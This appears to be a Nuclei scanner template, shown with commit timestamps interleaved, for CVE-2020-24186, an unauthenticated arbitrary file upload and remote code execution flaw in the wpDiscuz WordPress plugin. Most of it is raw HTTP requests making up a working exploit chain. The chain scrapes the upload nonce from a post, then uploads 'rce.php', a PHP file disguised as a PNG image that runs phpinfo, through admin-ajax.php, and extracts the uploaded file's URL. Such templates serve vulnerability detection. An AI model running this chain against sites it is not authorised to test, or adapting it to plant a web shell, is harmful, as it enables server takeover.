2021-02-28 07:23:43 +00:00
id : CVE-2020-24186
info :
2021-03-14 14:17:36 +00:00
name : Unauthenticated File upload wpDiscuz WordPress plugin RCE
2021-02-28 07:23:43 +00:00
author : Ganofins
2021-03-14 14:18:25 +00:00
severity : critical
2021-02-28 07:23:43 +00:00
description : WordPress wpDiscuz plugin version 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site’ s server.
reference : https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md
2021-03-14 14:17:36 +00:00
tags : cve,cve2020,wordpress,wp-plugin,rce
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score : 10.00
cve-id : CVE-2020-24186
cwe-id : CWE-434
2021-02-28 07:23:43 +00:00
requests :
- raw :
2021-03-14 14:17:36 +00:00
- |
GET /?p=1 HTTP/1.1
Host : {{Hostname}}
Accept : */*
2021-02-28 07:23:43 +00:00
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host : {{Hostname}}
X-Requested-With : XMLHttpRequest
2021-03-14 14:17:36 +00:00
Content-Type : multipart/form-data; boundary=----WebKitFormBoundary88AhjLimsDMHU1Ak
Origin : {{BaseURL}}
Referer : {{BaseURL}}
2021-02-28 07:23:43 +00:00
2021-03-14 14:17:36 +00:00
------WebKitFormBoundary88AhjLimsDMHU1Ak
2021-02-28 07:23:43 +00:00
Content-Disposition : form-data; name="action"
2021-03-14 14:20:00 +00:00
2021-02-28 07:23:43 +00:00
wmuUploadFiles
2021-03-14 14:17:36 +00:00
------WebKitFormBoundary88AhjLimsDMHU1Ak
2021-02-28 07:23:43 +00:00
Content-Disposition : form-data; name="wmu_nonce"
2021-03-14 14:20:00 +00:00
2021-03-14 14:17:36 +00:00
{{wmuSecurity}}
------WebKitFormBoundary88AhjLimsDMHU1Ak
2021-02-28 07:23:43 +00:00
Content-Disposition : form-data; name="wmuAttachmentsData"
2021-03-14 14:20:00 +00:00
2021-02-28 07:23:43 +00:00
undefined
2021-03-14 14:17:36 +00:00
------WebKitFormBoundary88AhjLimsDMHU1Ak
Content-Disposition : form-data; name="wmu_files[0]"; filename="rce.php"
Content-Type : image/png
2021-03-14 14:23:07 +00:00
2021-03-14 14:17:36 +00:00
{{base64_decode('/9j/4WpFeGlmTU0q/f39af39Pv39/f39/f39/f2o/f39/cD9/f39/f39/f39/f/g/UpGSUb9/f39/9tD/f0M/QwK/f0=')}}
2021-02-28 07:23:43 +00:00
<?php phpinfo();?>
2021-03-14 14:17:36 +00:00
------WebKitFormBoundary88AhjLimsDMHU1Ak
2021-02-28 07:23:43 +00:00
Content-Disposition : form-data; name="postId"
2021-03-14 14:20:00 +00:00
2021-03-14 14:17:36 +00:00
1
------WebKitFormBoundary88AhjLimsDMHU1Ak--
2021-02-28 07:23:43 +00:00
2021-03-14 14:17:36 +00:00
extractors :
- type : regex
part : body
internal : true
name : wmuSecurity
group : 1
regex :
- 'wmuSecurity":"([a-z0-9]+)'
2021-02-28 07:23:43 +00:00
2021-03-14 14:17:36 +00:00
- type : regex
part : body
group : 1
regex :
- '"url":"([a-z:\\/0-9-.]+)"'
matchers-condition : and
2021-02-28 07:23:43 +00:00
matchers :
- type : status
status :
- 200
2021-03-14 14:17:36 +00:00
- type : word
words :
- 'success":true'
- 'fullname'
- 'shortname'
- 'url'
condition : and
part : body